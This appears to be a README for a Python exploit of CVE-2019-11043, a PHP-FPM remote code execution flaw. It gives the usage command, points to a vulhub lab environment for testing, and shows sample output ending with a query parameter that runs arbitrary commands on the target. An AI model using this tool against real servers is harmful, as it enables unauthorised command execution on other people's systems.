Python exp for CVE-2019-11043
You can use build environment from https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043
Usage:
python3 main.py -u http://ip_to_page/index.php
If you success, you will see:
Base status code is 200
qsl:1760 with status code 502
The target maybe vulnerable, extended candidates is [1750, 1755, 1760]
Attack params found: --qsl 1755 --pisos 6 --skip-detect
Trying to set "session.auto_start=0"
Start attack!
Exploited! use "?a=/usr/bin/yourcommand"
Clean up /tmp/a...
Done
Reference:
https://github.com/neex/phuip-fpizdam